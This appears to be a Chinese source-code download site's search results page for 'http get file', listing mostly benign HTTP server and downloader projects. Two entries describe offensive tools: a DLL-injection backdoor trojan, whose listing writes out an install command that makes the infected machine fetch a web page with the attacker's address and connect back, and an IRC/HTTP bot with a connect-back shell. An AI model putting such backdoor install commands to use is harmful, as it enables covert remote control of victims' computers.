CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 搜索资源 - http get file

搜索资源列表

  1. 用Java实现Web服务器

    1下载:
  2. 用Java实现Web服务器 本文实现了GET请求的Web服务器程序的方法,通过创建ServerSocket类对象,监听端口8080; 等待、接受客户机连接到端口8080; 创建与socket字相关联的输入流和输出流 然后,读取客户机的请求信息,若请求类型是GET,则从请求信息中获取所访问的HTML文件名,如果HTML文件存在,则打开HTML文件,把HTTP头信息和HTML文件内容通过socket传回给Web浏览器,然后关闭文件。否则发送错误信息给Web浏览器。最后,关闭与相应Web浏览器连接
  3. 所属分类:Web服务器

    • 发布日期:2008-10-13
    • 文件大小:10425
    • 提供者:雨岳
  1. FastDown1.1

    1下载:
  2. 软件主页: www.gfastdown.com 文件说明: FastDownActiveX.zip ActiveX版 FastDownCB6.zip C++ Builder6 静态库 FastDownVC6.zip VC++ 6 静态库 FastDownVC7.zip VC++ 7 静态库 TestFastDown.zip 测试程序 TestFastDownSrcVC6.zip 测试程序源代码(VC版) TestFastDownSrcVB
  3. 所属分类:Delphi控件源码

    • 发布日期:2008-10-13
    • 文件大小:3208536
    • 提供者:zxq
  1. 050615adminchick-backdoor

    1下载:
  2. 注入进程的 超强DLL后门木马 支持系统 2000以上, 功能: 1.支持密码验证 2.cmd命令 3.上传下载 安装: 要用到的程序. install.exe 和 ServerDll.dll 在CMD下 运行 install -h http://www.donews.net/xxx/archive/2004/09/26/110321.aspx -p 1234567 -h 后面接的是一个网页的地址。网页里面包含自己的IP和端口,肉鸡读到后,会进行反弹连接 -p 后面是认证密码 在静态网页中,必须
  3. 所属分类:远程控制编程

    • 发布日期:2008-10-13
    • 文件大小:110566
    • 提供者:aaaa
  1. Senfore_DragDrop_v4.1

    0下载:
  2. Drag and Drop Component Suite Version 4.1 Field test 5, released 16-dec-2001 ?1997-2001 Angus Johnson & Anders Melander http://www.melander.dk/delphi/dragdrop/ ------------------------------------------- Table of Contents: ----------------------
  3. 所属分类:Windows编程

    • 发布日期:2011-12-21
    • 文件大小:2130304
    • 提供者:smj_9547
  1. VB_NET_Ie7Clone.rar

    0下载:
  2. VB.NET的Web浏览器IE7的克隆选项卡式浏览器 描述:这是一个例子写的vb.net浏览器使用的。 NET Framework 2.0 ( Visual Studio 2005中) 。这是一个标签式网页浏览器。这表明许多例子与新的浏览器控制和加载文件。你会发现在这个例子中是:基本浏览器的导航和功能,搜索服务提供商的代码,与收藏,显示如何显示大多数的对话可以在Internet Explorer 7 ,文档浏览器,抓取图片的网页,确定,并与元素用户上空盘旋在加载的文件。还包括代码处理弹出包括
  3. 所属分类:Other systems

    • 发布日期:2017-05-13
    • 文件大小:913738
    • 提供者:吴浩源
  1. Downloader

    1下载:
  2. 用C语言编写的Http get功能,可以查看http header, 可以下载任意文件,包含Windows UI和窗口过程函数-Written in C language with the Http get features, you can view the http header, you can download any file that contains the Windows UI and window process function
  3. 所属分类:Browser Client

    • 发布日期:2017-04-02
    • 文件大小:44868
    • 提供者:lyz
  1. HTTP

    0下载:
  2. 简单WEB服务器,能够通过HTTP GET命令获得一个简单的文件-A simple WEB server through HTTP GET command to obtain a simple file
  3. 所属分类:Java Develop

    • 发布日期:2017-03-27
    • 文件大小:7727
    • 提供者:linchao
  1. HTTP_IRC_bot

    0下载:
  2. A remote administratio/bot source. Get command through either http or irc. Can execute a command on a specific time, uses simple XOR encryption for command file transfer. Also has embeded a replacemed connect-back shell. The structure of the command
  3. 所属分类:Remote Control

    • 发布日期:2014-04-15
    • 文件大小:2190000
    • 提供者:DarkK
  1. HttpGetFile

    0下载:
  2. http get file command line util
  3. 所属分类:Delphi VCL

    • 发布日期:2017-03-28
    • 文件大小:350835
    • 提供者:Jay
  1. WebWatch

    0下载:
  2. C#实现抓取Http文件进行分析,实现GZip编码解压缩,及自动生成Form表单-Get http file and analysis, decocde gzip stream and buid auto form.
  3. 所属分类:Sniffer Package capture

    • 发布日期:2017-04-02
    • 文件大小:127131
    • 提供者:zero_create
  1. CSharp_Simulation_IIS_SeverGET_POST

    0下载:
  2. 建于: 2010-12-12 作者: kevery / 香門 QQ:214958266 目的: 模拟IIS服务器 当前: 测试模块效果 测试环境:Visual Studio 2005 C# .NET Framework 2.0 windows 7 用途: 建立简单C/B/S模式转输数据. 优点: 采用HTTP方式(方式:POST GET) ,简单,实用. GET方式时,访问未指明的文件名时,默认访问:index.html文件,即默认主页-Built in: 2010
  3. 所属分类:Web Server

    • 发布日期:2017-03-31
    • 文件大小:179351
    • 提供者:香门
  1. w

    0下载:
  2. a) 能发送HTTP的GET消息,从任何WEB服务器中获取指定WEB页面; b) 获取WEB页面后,能将页面保存为本地文件index.html; c) 能显示index.html文件源码 d) 能调用Linux系统中的Web浏览器(如mozilla)正确显示index.html页面。 -a) can send an HTTP GET message, WEB page from any Web server to obtain the specified b) access
  3. 所属分类:Linux Network

    • 发布日期:2017-04-03
    • 文件大小:1886
    • 提供者:lqc
  1. File-Transmit-Source-Code

    0下载:
  2. 【软件名称】 支持多线程断点续传的文件传输(FTP)程序(含服务端和客户端、支持蓝牙(Bluetooth)传输) 【版 本】 1.0.0 【操作系统】 Windows 桌面系列、Windows Mobile 【作 者】 谢红伟 · chrys · chrys@163.com · http://www.viction.net 【软件说明】 可用来在计算机与计算机之间传输文件,还可用来在智能手机之间通过蓝牙、无线网络、数据线传输文件,支持多线程和断点续传,代码已经封装成一个dll库,可以作为服务器来
  3. 所属分类:WinSock-NDIS

    • 发布日期:2016-04-05
    • 文件大小:321536
    • 提供者:dzw
  1. lhttp

    0下载:
  2. 一个简单的http服务器支持http get文件传输-A simple http server supports http get file transfer
  3. 所属分类:Linux Network

    • 发布日期:2017-11-14
    • 文件大小:9192
    • 提供者:陈张
  1. Downloader

    0下载:
  2. 使用了多线程技术,每个任务一条线程,不过只支持HTTP协议的文件下载,FTP协议的没测试,也没想弄这方面-Not tested using multi-threading technology, one thread for each task, but only supports the HTTP protocol file downloads, FTP protocol, but also thought to get this regard
  3. 所属分类:CSharp

    • 发布日期:2017-04-26
    • 文件大小:96779
    • 提供者:luming
  1. android-async-http-master

    0下载:
  2. 网络异步获取上传的工具类,异步获取网络数据,还有上传文件,下载文件的功能。-AsyncHttpClient net get post,file upload and download,it s very good
  3. 所属分类:android

    • 发布日期:2017-03-27
    • 文件大小:543848
    • 提供者:口水
  1. web_server

    0下载:
  2. 服务器监听80端口,提供WEB服务,能够响应浏览器发送的的HTTP GET请求,向浏览器返回静态HTML页面: 1、如果请求的URL是一个文件,并且该文件存在,返回请求的页面或文件。 2、如果这个文件不存在,返回404错误。 3、如果请求的是一个目录,返回目录的结构给客户端。 服务器通过fork子进程处理新的请求,实现并发处理。服务器能够记录访问日志,包括时间、客户端的IP地址和请求的URL。 -Server listens on port 80 to provide WEB
  3. 所属分类:source in ebook

    • 发布日期:2017-04-14
    • 文件大小:2953
    • 提供者:张三
  1. httpcmparser

    0下载:
  2. 通过连接http,得到返回的数据,并将返回的数据,解析出来,生成csv文件(By connecting HTTP, get the returned data, and parse out the returned data to generate the CSV file)
  3. 所属分类:Java编程

    • 发布日期:2017-12-15
    • 文件大小:54272
    • 提供者:wdnxcm
  1. Desktop

    0下载:
  2. c语言实现的http上传文件代码,并获取设备的ip地址,mac地址,根据mac地址获取随机数(C language to achieve HTTP upload file code, and get the IP address of the device, MAC address, according to the MAC address to get the random number.)
  3. 所属分类:Linux/Unix编程

    • 发布日期:2020-04-05
    • 文件大小:2048
    • 提供者:qbxu85
  1. pb11.5_url_test

    2下载:
  2. pb11.5 + pbni + libcurl 调用http、https,实现了get、post(返回文本支持gzip解压,post支持gzip压缩上传)、文件上传、下载(带进度条显示);提供同步、异步两种操作方式;pb11.5以上版本,可自行升级,应该可以使用,11.5以下版本不支持。(Pb11.5 + pbni + libcurl calls HTTP and HTTPS,realizes get,post (return text supports gzip decompression,
  3. 所属分类:Windows编程

    • 发布日期:2020-10-20
    • 文件大小:210944
    • 提供者:ganzhenyu001
« 12 3 4 »
搜珍网 www.dssz.com